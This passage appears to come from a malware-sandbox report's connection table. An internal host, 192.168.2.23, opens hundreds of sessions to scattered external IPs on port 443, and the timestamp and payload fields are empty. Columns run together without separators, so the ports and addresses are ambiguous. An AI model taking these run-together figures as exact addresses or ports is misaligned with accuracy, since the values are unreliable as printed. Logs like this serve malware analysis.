                                                20363192.168.2.233851063.72.142.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20364192.168.2.233286442.222.200.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20365192.168.2.235279440.45.93.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20366192.168.2.2349496101.54.108.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20367192.168.2.2353304203.202.162.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20368192.168.2.2350656163.96.186.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20369192.168.2.2341890194.181.179.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20370192.168.2.2343074199.56.39.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20371192.168.2.2347778195.238.160.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20372192.168.2.234272896.128.29.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20373192.168.2.2332936190.139.73.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20374192.168.2.2337474167.213.153.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20375192.168.2.2334784217.5.29.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20376192.168.2.235348899.80.229.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20377192.168.2.2352960157.71.89.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20378192.168.2.234697492.248.15.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20379192.168.2.2356094199.28.152.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20380192.168.2.2347902196.238.115.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20381192.168.2.2339518121.58.26.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20382192.168.2.2351014138.39.116.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20383192.168.2.234725496.143.43.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20384192.168.2.2351434207.217.66.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20385192.168.2.234435047.45.201.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20386192.168.2.2356208189.46.52.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20387192.168.2.2357754195.75.78.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20388192.168.2.2350290178.234.112.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20389192.168.2.2334154184.22.88.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20390192.168.2.235940024.204.164.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20391192.168.2.2351874120.97.110.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20392192.168.2.2340968192.175.219.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20393192.168.2.235634244.217.190.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20394192.168.2.2338366167.28.46.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20395192.168.2.2355938164.81.70.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20396192.168.2.2340414139.196.89.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20397192.168.2.235000490.84.38.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20398192.168.2.235596494.107.54.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20399192.168.2.2358914176.3.183.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20400192.168.2.2343920113.122.70.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20401192.168.2.2335548175.4.233.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20402192.168.2.2344128209.215.134.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20403192.168.2.2351498183.183.46.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20404192.168.2.2333522152.112.212.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20405192.168.2.233519271.85.239.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20406192.168.2.2356704100.32.109.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20407192.168.2.235706650.220.52.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20408192.168.2.2350734189.73.86.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20409192.168.2.234323892.145.9.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20410192.168.2.2345122176.254.222.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20411192.168.2.2339336147.191.17.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20412192.168.2.2345520160.9.110.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20413192.168.2.2357276101.155.177.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20414192.168.2.2336166157.197.144.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20415192.168.2.2349890108.5.17.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20416192.168.2.233478427.77.211.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20417192.168.2.23457725.128.162.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20418192.168.2.2353932102.114.192.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20419192.168.2.2336422149.20.44.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20420192.168.2.2348816185.89.124.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20421192.168.2.2348370160.58.66.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20422192.168.2.2348248175.190.255.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20423192.168.2.235491237.227.81.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20424192.168.2.233442877.95.0.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20425192.168.2.2355166133.89.147.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20426192.168.2.235910845.246.245.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20427192.168.2.2348654132.78.142.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20428192.168.2.235273243.77.181.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20429192.168.2.2360282173.150.235.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20430192.168.2.235749046.46.196.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20431192.168.2.2348578108.184.159.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20432192.168.2.2357812153.149.255.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20433192.168.2.233874858.81.212.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20434192.168.2.235317690.131.232.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20435192.168.2.2339556219.10.83.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20436192.168.2.2358446168.58.22.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20437192.168.2.2348254180.216.252.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20438192.168.2.2351260194.208.216.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20439192.168.2.2341686222.195.108.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20440192.168.2.235584071.182.20.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20441192.168.2.2344630146.152.172.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20442192.168.2.235172497.9.62.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20443192.168.2.236086261.196.216.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20444192.168.2.2335212110.254.244.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20445192.168.2.233481469.30.168.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20446192.168.2.235510448.165.70.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20447192.168.2.233350281.145.77.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20448192.168.2.234734273.127.122.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20449192.168.2.234277838.49.88.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20450192.168.2.2357528180.142.99.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20451192.168.2.2356390175.112.15.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20452192.168.2.2340272126.101.213.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20453192.168.2.2351580175.6.235.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20454192.168.2.2344002222.171.182.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20455192.168.2.2351580155.93.184.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20456192.168.2.233656462.74.171.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20457192.168.2.234107851.240.169.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20458192.168.2.2349322110.180.19.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20459192.168.2.235183078.90.115.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20460192.168.2.234450660.187.181.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20461192.168.2.2344806160.167.107.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20462192.168.2.2337964146.186.194.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20463192.168.2.23525868.253.69.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20464192.168.2.2357120110.241.70.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20465192.168.2.2357420179.0.110.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20466192.168.2.2338768175.117.43.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20467192.168.2.2357390165.208.250.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20468192.168.2.234246462.191.219.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20469192.168.2.234206095.3.86.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20470192.168.2.235437086.31.20.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20471192.168.2.234298080.36.203.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20472192.168.2.2346710205.111.13.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20473192.168.2.235502667.76.153.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20474192.168.2.2345208165.213.211.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20475192.168.2.2346250192.237.49.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20476192.168.2.2347268182.29.135.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20477192.168.2.2341584206.152.227.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20478192.168.2.236021640.174.63.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20479192.168.2.234569643.145.36.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20480192.168.2.2346624209.239.202.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20481192.168.2.235677658.250.31.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20482192.168.2.2339412141.182.99.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20483192.168.2.2350214199.206.6.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20484192.168.2.235169258.39.93.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20485192.168.2.2343168159.133.220.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20486192.168.2.234223881.212.65.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20487192.168.2.2340070185.253.214.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20488192.168.2.2349006187.209.35.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20489192.168.2.2334130119.222.137.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20490192.168.2.2348518120.237.84.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20491192.168.2.2360808109.32.94.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20492192.168.2.2348862154.230.196.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20493192.168.2.2346654182.142.53.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20494192.168.2.233379887.221.225.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20495192.168.2.2353950148.223.98.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20496192.168.2.2353574114.24.93.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20497192.168.2.234534259.74.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20498192.168.2.2358864177.130.40.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20499192.168.2.2344020135.72.140.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20500192.168.2.235543447.212.83.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20501192.168.2.2352542109.87.9.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20502192.168.2.2352522176.13.122.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20503192.168.2.234229832.179.229.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20504192.168.2.2335846152.133.41.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20505192.168.2.234878054.59.215.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20506192.168.2.2336724195.148.157.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20507192.168.2.234208674.7.46.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20508192.168.2.2340362162.184.92.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20509192.168.2.2358160140.251.188.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20510192.168.2.2356772130.3.149.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20511192.168.2.23479289.137.15.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20512192.168.2.2333538112.20.178.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20513192.168.2.235707827.223.119.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20514192.168.2.235764297.129.40.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20515192.168.2.233464297.211.182.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20516192.168.2.2356406216.13.155.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20517192.168.2.2360614197.208.213.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20518192.168.2.234889442.160.255.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20519192.168.2.2339956184.247.5.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20520192.168.2.2342836144.96.223.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20521192.168.2.2353886223.210.2.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20522192.168.2.2341324150.32.141.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20523192.168.2.233732620.9.107.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20524192.168.2.234902235.189.114.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20525192.168.2.234702043.141.15.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20526192.168.2.233291289.87.128.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20527192.168.2.2334146222.248.114.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20528192.168.2.234460293.41.247.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20529192.168.2.2343356118.59.98.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20530192.168.2.2349576121.46.121.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20531192.168.2.2355892223.212.66.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20532192.168.2.2341248128.41.222.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20533192.168.2.234834465.198.115.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20534192.168.2.2339254211.103.32.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20535192.168.2.235409844.170.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20536192.168.2.235569661.16.138.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20537192.168.2.234520467.65.207.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20538192.168.2.235980082.209.127.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20539192.168.2.2351210165.132.241.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20540192.168.2.235229499.247.65.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20541192.168.2.2336540156.248.102.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20542192.168.2.2336700161.185.223.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20543192.168.2.234802263.135.254.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20544192.168.2.234852019.214.4.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20545192.168.2.2345822152.99.26.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20546192.168.2.233393495.178.164.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20547192.168.2.235793858.170.147.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20548192.168.2.2360484155.238.134.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20549192.168.2.2359200101.83.37.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20550192.168.2.2360390144.219.65.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20551192.168.2.2351494114.249.162.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20552192.168.2.2359800212.220.216.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20553192.168.2.235001479.160.114.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20554192.168.2.2347862221.62.132.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20555192.168.2.2348130104.116.47.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20556192.168.2.2344982105.94.200.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20557192.168.2.233334479.151.66.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20558192.168.2.234830286.211.188.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20559192.168.2.236074242.122.118.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20560192.168.2.233550023.239.135.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20561192.168.2.2360712184.198.143.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20562192.168.2.2354000107.131.23.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20563192.168.2.233949818.147.109.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20564192.168.2.2333466170.2.0.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20565192.168.2.2360220166.154.212.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20566192.168.2.234794857.130.215.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20567192.168.2.2360622207.32.221.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20568192.168.2.235379887.146.182.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20569192.168.2.233840013.90.140.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20570192.168.2.2351950173.34.182.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20571192.168.2.236013634.60.185.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20572192.168.2.234705889.184.33.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20573192.168.2.234057284.183.53.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20574192.168.2.2345596206.39.96.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20575192.168.2.2357168152.110.119.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20576192.168.2.2336810120.189.197.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20577192.168.2.2345836135.53.224.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20578192.168.2.2345050212.51.131.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20579192.168.2.2349998175.151.198.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20580192.168.2.2353824108.151.240.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20581192.168.2.2355084167.40.107.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20582192.168.2.2350080191.118.82.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20583192.168.2.2334662130.179.48.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20584192.168.2.235291644.178.93.198443
                                                TimestampBytes transferredDirectionData


